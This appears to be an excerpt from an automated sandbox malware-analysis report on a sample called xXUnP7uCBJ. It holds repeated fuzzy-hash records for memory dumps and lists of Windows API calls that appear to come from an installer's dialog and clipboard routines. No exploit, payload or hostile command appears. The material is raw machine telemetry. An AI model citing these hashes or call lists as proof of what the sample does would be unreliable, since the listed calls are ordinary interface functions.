                                                                                                              • Instruction ID: c02794a464c8fad67cf5764bb2e96f7fb8c54a129b75d2599fe87b966cd3aba2
                                                                                                              • Opcode Fuzzy Hash: 819ab5a604e6e6a6ad169832c8aa35e33ffe16aa59d0f2cd19f7d1ea504bcab0
                                                                                                              • Instruction Fuzzy Hash: F2C1C074E01218CFEB14DFA5C994B9DBBB2BF89304F6081A9D809AB355DB359E81CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2e627fe0bc05e5482b9eec3b21d620ff782a68af6238023222489dcf587216d3
                                                                                                              • Instruction ID: 814bc51942c924644dc20ecf95abe919bb9fabc78d43865e22539b75a52f127c
                                                                                                              • Opcode Fuzzy Hash: 2e627fe0bc05e5482b9eec3b21d620ff782a68af6238023222489dcf587216d3
                                                                                                              • Instruction Fuzzy Hash: CFC1C274E00218CFDB14DFA5C994B9DBBB2BF89304F6081A9D809AB365DB359E81CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5c3c80b572dc4df8975fe22d6f017639c1f3dfd7ddb74bf741a5d91a025aefcb
                                                                                                              • Instruction ID: 66fb50803e7a8d38f0ca176897c5cc4e8fad79aa60135327d0d2c7aaf3e219c6
                                                                                                              • Opcode Fuzzy Hash: 5c3c80b572dc4df8975fe22d6f017639c1f3dfd7ddb74bf741a5d91a025aefcb
                                                                                                              • Instruction Fuzzy Hash: ECC1B174E00218CFEB54DFA9C994B9DBBB2BF89304F6081A9D809AB355DB355E81CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8d065a147f6f9a2971818ec653b4d709edb9d899d2472c51a26fd823a9425100
                                                                                                              • Instruction ID: 8c17c8d709cbb76f1ccb5eb4a331d25a730b47c1ed15acb4e3c75bdb38b7271b
                                                                                                              • Opcode Fuzzy Hash: 8d065a147f6f9a2971818ec653b4d709edb9d899d2472c51a26fd823a9425100
                                                                                                              • Instruction Fuzzy Hash: F2C1C174E00218CFEB54DFA5C994B9DBBB2BF89304F6081A9D809AB355DB359E81CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cfb4bfcd6b17510462a8dc30961842fdc6dfcf3bd76e5c8f5b64e4308b13d900
                                                                                                              • Instruction ID: 9f06acdf5265ccabcc7bde0fd375d052dea7fb7c56cca788c5815f39bbe27d2f
                                                                                                              • Opcode Fuzzy Hash: cfb4bfcd6b17510462a8dc30961842fdc6dfcf3bd76e5c8f5b64e4308b13d900
                                                                                                              • Instruction Fuzzy Hash: FFC1C174E00218CFEB14DFA5C994B9DBBB2BF89304F6081A9D809AB355DB355E81CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 07aa8cd5eb7d77df3306f47338a895de87760ced74f01235afff50d24ff04ed7
                                                                                                              • Instruction ID: 2ccd1fb70b7dd655b009783eb00502ffb12176e2752ee3cd7dac90880238904f
                                                                                                              • Opcode Fuzzy Hash: 07aa8cd5eb7d77df3306f47338a895de87760ced74f01235afff50d24ff04ed7
                                                                                                              • Instruction Fuzzy Hash: CDC1C074E01218CFEB54DFA5C994B9DBBB2BF89300F6081A9D809AB355DB359E81CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 29df987aff338393baee4ea35f3fb933b6ab011efedc044f73ca133512a265dc
                                                                                                              • Instruction ID: 1638d70fd4607f2a7bf53ef6ad01756abb902af69c951b9969451a3c32a98ac0
                                                                                                              • Opcode Fuzzy Hash: 29df987aff338393baee4ea35f3fb933b6ab011efedc044f73ca133512a265dc
                                                                                                              • Instruction Fuzzy Hash: 3DC1D274E01218CFDB14DFA5C954B9DBBB2BF89304F2081A9D809AB365DB359E81CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 738fc04c7b50ad26d69c3c5795b1122003864f0300d7164fcde354a6045fc931
                                                                                                              • Instruction ID: ad552eff5c2c95691f8ecb8fb7e379c9ec6185156da28dbc358b7cbc86bf15c7
                                                                                                              • Opcode Fuzzy Hash: 738fc04c7b50ad26d69c3c5795b1122003864f0300d7164fcde354a6045fc931
                                                                                                              • Instruction Fuzzy Hash: 00C1C174E00218CFEB54DFA5C994B9DBBB2BF89304F6081A9D809AB355DB359E81CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b58383d846fb0b8b068bbc9fc185ad9db865fcbb9ef3764ad778fa58e2570c48
                                                                                                              • Instruction ID: dd1b6cb463873547d6ef926b1f7b4762d582e546ecdf5efa0f8762299b15aaa6
                                                                                                              • Opcode Fuzzy Hash: b58383d846fb0b8b068bbc9fc185ad9db865fcbb9ef3764ad778fa58e2570c48
                                                                                                              • Instruction Fuzzy Hash: ACC1D274E00218CFEB14DFA5C994B9DBBB2BF89300F6081A9D809AB355DB355E86CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d051a3cb1b05c7ee9b0f9b8e9fde8f93a5b48ae48b92c21df90113104ac030e1
                                                                                                              • Instruction ID: f87d0992c95a2c8c31cf5dee0e6766f5ebd1002c42ec61615f747bf4d57a6149
                                                                                                              • Opcode Fuzzy Hash: d051a3cb1b05c7ee9b0f9b8e9fde8f93a5b48ae48b92c21df90113104ac030e1
                                                                                                              • Instruction Fuzzy Hash: E7C1B174E00218CFEB14DFA5C994B9DBBB2AF89304F6081A9D809AB355DB359E85CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6051f13dd92550cfd25fe8ef11611512788d8d7774744390f1d7ae265f66b767
                                                                                                              • Instruction ID: 7ed32da358eefd57b168b1c3da7a2597c66a801923440409ed425a37787c39a8
                                                                                                              • Opcode Fuzzy Hash: 6051f13dd92550cfd25fe8ef11611512788d8d7774744390f1d7ae265f66b767
                                                                                                              • Instruction Fuzzy Hash: FDC1B174E00218CFEB14DFA5C994B9DBBB2BF89304F6081A9D809AB355DB359E85CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983114946.0000000038FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FC0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_38fc0000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 24285279a25fede59d3d6f74b55d87f55488adf61292fe5b41f5f8c2b26ce5a9
                                                                                                              • Instruction ID: e15cd8bca9fd1fae4d56658a2bf5b35f924bdd7307c03bc05c3aa22fc7304f08
                                                                                                              • Opcode Fuzzy Hash: 24285279a25fede59d3d6f74b55d87f55488adf61292fe5b41f5f8c2b26ce5a9
                                                                                                              • Instruction Fuzzy Hash: 72C1B174E00218CFEB54DFA5C994B9DBBB2BF89300F6085A9D809AB355DB359E85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983114946.0000000038FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FC0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_38fc0000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a6c2e5163a9123f63a8a7d29ad59cc5433ad810f1199f41cd96e0fdbf52c82e4
                                                                                                              • Instruction ID: 76269595ad8ecd5988635541fd96fb38284e30153494ef28b9ad85e603ec4844
                                                                                                              • Opcode Fuzzy Hash: a6c2e5163a9123f63a8a7d29ad59cc5433ad810f1199f41cd96e0fdbf52c82e4
                                                                                                              • Instruction Fuzzy Hash: 33C19E74E00219CFEB54DFA5C994B9DBBB2FF89300F6081A9D809AB355DB359A85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983114946.0000000038FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FC0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_38fc0000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a8c75a7c484f772475f164de7fd7f451cdb43acc4719ae677aed967101880ed3
                                                                                                              • Instruction ID: 4a2f418f913a591712fc2b921b510c58a96eaf22529a698fa14f64468e57313c
                                                                                                              • Opcode Fuzzy Hash: a8c75a7c484f772475f164de7fd7f451cdb43acc4719ae677aed967101880ed3
                                                                                                              • Instruction Fuzzy Hash: 70C1B178E00219CFDB54DFA5C994B9DBBB2BF89300F6081A9D809AB355DB355E85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983114946.0000000038FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FC0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_38fc0000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9423157c9404385ff5744b0258cf0d449b792983810d89d65a402fc02306d3ed
                                                                                                              • Instruction ID: 6e80121655f66ad98364b0f58a95b32504f02ae0635ca87cd264a192323910a8
                                                                                                              • Opcode Fuzzy Hash: 9423157c9404385ff5744b0258cf0d449b792983810d89d65a402fc02306d3ed
                                                                                                              • Instruction Fuzzy Hash: 94C1A074E00219CFEB54DFA5C994B9DBBB2BF89300F6081A9D809AB355DB359E85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983114946.0000000038FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FC0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_38fc0000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8d0bab30c703297b2569c7b630ff15ffce4b556e1030f0088ee772d455bad300
                                                                                                              • Instruction ID: 66ff7ec3fd3c6e86ef60b7106fa31724f93c0302d4874fc6b499f6250f0bed2b
                                                                                                              • Opcode Fuzzy Hash: 8d0bab30c703297b2569c7b630ff15ffce4b556e1030f0088ee772d455bad300
                                                                                                              • Instruction Fuzzy Hash: 67B1C078E00219CFDB54DFA4C994B9DBBB2BF89304F6085A9D809AB351DB359E85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 44f8e83611e2280b948bdeaf15047842208491fd054448301a860cb834ae0830
                                                                                                              • Instruction ID: 1839888c3b7636e91330cec95ab3a88c16efe9946a30119ae2200a972ba46f47
                                                                                                              • Opcode Fuzzy Hash: 44f8e83611e2280b948bdeaf15047842208491fd054448301a860cb834ae0830
                                                                                                              • Instruction Fuzzy Hash: 2EA19C74E01228CFDB64DF64C854BD9BBB2BB89301F5095EAD90DA7260DB319E81CF51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 935853dcd4882d8077d409b93cbdc575f0a6b029eb3e44233bfb913bbc42a7e2
                                                                                                              • Instruction ID: 84073049cad36562a95f4cb3bdedff63723d77d5c354e6a057971adf4f1797dc
                                                                                                              • Opcode Fuzzy Hash: 935853dcd4882d8077d409b93cbdc575f0a6b029eb3e44233bfb913bbc42a7e2
                                                                                                              • Instruction Fuzzy Hash: 3A519074A01229CFDB64DF64C854B99B7B2BB4A301F5099EAD80AB7350DB329E81CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4d9c96d32360d2584081ec1aa6ea9e180c90040bdb9d8ba5a39feb2959762ab5
                                                                                                              • Instruction ID: e12b03d8e2b4cdeee6e78c17044c2fbd3c731dcc06bddb84ff0c5534f146203e
                                                                                                              • Opcode Fuzzy Hash: 4d9c96d32360d2584081ec1aa6ea9e180c90040bdb9d8ba5a39feb2959762ab5
                                                                                                              • Instruction Fuzzy Hash: F7D09278E4431D8BDB21DFA4D8442ECF770BB9A300F0129A6818CA7210EB719FA4DE56
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                                              • GetClientRect.USER32(?,?), ref: 00405639
                                                                                                              • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                                              • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                                                                                • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                                              • ShowWindow.USER32(00000000), ref: 00405788
                                                                                                              • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                                                                              • ShowWindow.USER32(00000008), ref: 004057D7
                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                                              • CreatePopupMenu.USER32 ref: 0040581C
                                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                                              • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                                              • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                                              • EmptyClipboard.USER32 ref: 004058B7
                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                                              • CloseClipboard.USER32 ref: 00405912
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                              • String ID: (7B${
                                                                                                              • API String ID: 590372296-525222780
                                                                                                              • Opcode ID: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                                                                              • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                                                                              • Opcode Fuzzy Hash: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                                                                              • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                                                                              APIs
                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                                              • ShowWindow.USER32(?), ref: 00403EDF
                                                                                                              • DestroyWindow.USER32 ref: 00403EF3
                                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                                              • GetDlgItem.USER32(?,?), ref: 00403F30
                                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403FF9
                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                                              • EnableWindow.USER32(?,?), ref: 00404147
                                                                                                              • EnableWindow.USER32(?,?), ref: 00404162
                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
                                                                                                              • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
                                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                                              • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                                                                              • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                              • String ID: (7B
                                                                                                              • API String ID: 184305955-3251261122
                                                                                                              • Opcode ID: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                                                                              • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                                                                              • Opcode Fuzzy Hash: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                                                                              • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D
                                                                                                              APIs
                                                                                                                • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                              • lstrcatW.KERNEL32(00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800,75573420,00435000,00000000), ref: 00403B59
                                                                                                              • lstrlenW.KERNEL32(004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800), ref: 00403BD9
                                                                                                              • lstrcmpiW.KERNEL32(004281D8,.exe,004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                                                                              • GetFileAttributesW.KERNEL32(004281E0), ref: 00403BF7
                                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403C40
                                                                                                                • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                              • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                                                                              • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                                                                              • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                              • String ID: (7B$.DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                              • API String ID: 1975747703-1425696872
                                                                                                              • Opcode ID: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                                                                              • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                                                                              • Opcode Fuzzy Hash: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                                                                              • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D
                                                                                                              APIs
                                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
                                                                                                              • GetSysColor.USER32(?), ref: 004045FE
                                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                              • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                                              • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                              • SetCursor.USER32(00000000), ref: 00404720
                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                                              • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
